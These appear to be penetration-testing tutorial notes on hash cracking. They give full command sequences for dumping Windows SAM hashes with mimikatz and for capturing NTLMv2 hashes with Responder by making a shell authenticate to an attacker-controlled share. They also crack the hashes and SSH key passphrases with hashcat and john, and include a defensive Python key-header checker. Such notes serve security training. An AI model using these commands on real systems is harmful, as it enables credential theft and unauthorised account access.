Hash Cracking
There are many kinds of hashes to crack. Below we cover the most common ones and show the general pattern you can apply to the rest: extract the hash, identify its type (the hashcat mode or john format), and run a wordlist against it.
NTLM Cracking
How to get the NTLM hash
Condition: you need administrator access on the machine to dump the NTLM hashes of its other users.
Step 1. Start PowerShell as administrator.
Step 2. Get mimikatz.exe onto the machine and execute it.
See the methods for downloading files onto a Windows machine.
Step 3. Run the following mimikatz commands to dump the hashes.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
<hashes of other users will be displayed>
Step 4. Save the hash to a file and crack it with hashcat (mode 1000 is NTLM).
hashcat -m 1000 ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
The rule file is optional; use one only if you want hashcat to mutate the words in the list.
NTLMv2 Hash Cracking
How to get the NTLMv2 hash
Condition: NTLMv2 hashes can be obtained in many ways; this method applies when you have a shell on the machine but do not have the user's password.
Step 1. Start Responder in your kali machine
sudo responder -I eth0
Step 2. From the shell, request a file on a share hosted by the Kali machine.
dir \\<IP of Kali machine>\test.txt
When the machine tries to reach the share it authenticates to Responder with the user's NTLMv2 hash, which Responder captures for you to crack.
Step 3. Crack the captured hash (mode 5600 is NetNTLMv2).
hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force
Cracking SSH Private Key Passphrase
Private keys are sometimes protected with a passphrase; to use such a key we first extract a hash of the key file and then crack that hash to recover the passphrase.
For this we use the tool ssh2john.
Extract the hash
ssh2john id_rsa > ssh.hash
Crack the hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
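The ssh2john step works against the header of the key file, so it is worth knowing what that header says. As an added example (not from the original notes and not ssh2john code), the following Python reads only the header fields of a private key file and reports whether it has a passphrase at all and which KDF protects it: modern openssh-key-v1 files use bcrypt with a round count, while legacy PEM files ("Proc-Type: 4,ENCRYPTED") derive their key with a single MD5 pass and crack far faster. The key files it parses are constructed here and contain no key material; the names key_protection, weakly_protected and make_openssh_header are assumptions of this example.

```python
# Added example, not part of the original notes: inspect a private key file and
# report whether it carries a passphrase and which KDF protects it, reading
# only the header fields (no key material is decoded).
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf: bytes, pos: int):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[pos:pos + 4])
    return buf[pos + 4:pos + 4 + n], pos + 4 + n


def key_protection(key_text: str) -> dict:
    """Describe how a PEM-armoured private key file is protected."""
    lines = [ln.strip() for ln in key_text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        pos = len(OPENSSH_MAGIC)
        cipher, pos = _read_string(blob, pos)      # "none" means no passphrase
        kdf, pos = _read_string(blob, pos)         # "bcrypt" or "none"
        kdfopts, pos = _read_string(blob, pos)     # for bcrypt: string salt, uint32 rounds
        rounds = None
        if kdf == b"bcrypt":
            _salt, p = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[p:p + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        encrypted = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines[1:])
        # Legacy PEM keys derive the cipher key from the passphrase with one MD5 pass
        # (OpenSSL EVP_BytesToKey); "legacy-pem-md5" is this example's own label for it.
        return {"format": "pem", "encrypted": encrypted, "cipher": None,
                "kdf": "legacy-pem-md5" if encrypted else None, "rounds": None}
    raise ValueError("unrecognised private key header")


def weakly_protected(info: dict) -> bool:
    """True when the key has no passphrase at all, or relies on the legacy PEM
    KDF, which a wordlist attack like the john run above gets through far
    faster than bcrypt with a real round count."""
    return (not info["encrypted"]) or info["format"] == "pem"


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def make_openssh_header(cipher: bytes, kdf: bytes, rounds: int = 16) -> str:
    """Build a constructed openssh-key-v1 file holding only the header fields
    (no key material) so the parser can be exercised offline."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed samples, not real keys.
ENCRYPTED_OPENSSH = make_openssh_header(b"aes256-ctr", b"bcrypt", 16)
PLAINTEXT_OPENSSH = make_openssh_header(b"none", b"none")
ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, text in [("openssh/bcrypt", ENCRYPTED_OPENSSH),
                       ("openssh/none", PLAINTEXT_OPENSSH),
                       ("legacy pem", ENCRYPTED_PEM)]:
        info = key_protection(text)
        print(name, info, "WEAK" if weakly_protected(info) else "ok")
```

Point the same key_protection function at a real id_rsa to see which case it falls into before deciding whether cracking the passphrase is realistic, and, on the defensive side, to find keys that have no passphrase or still use the legacy PEM format.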
Cracking Net-NTLMv2
Net-NTLMv2 is the same hash type as in the NTLMv2 section above, so hashcat mode 5600 applies.
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force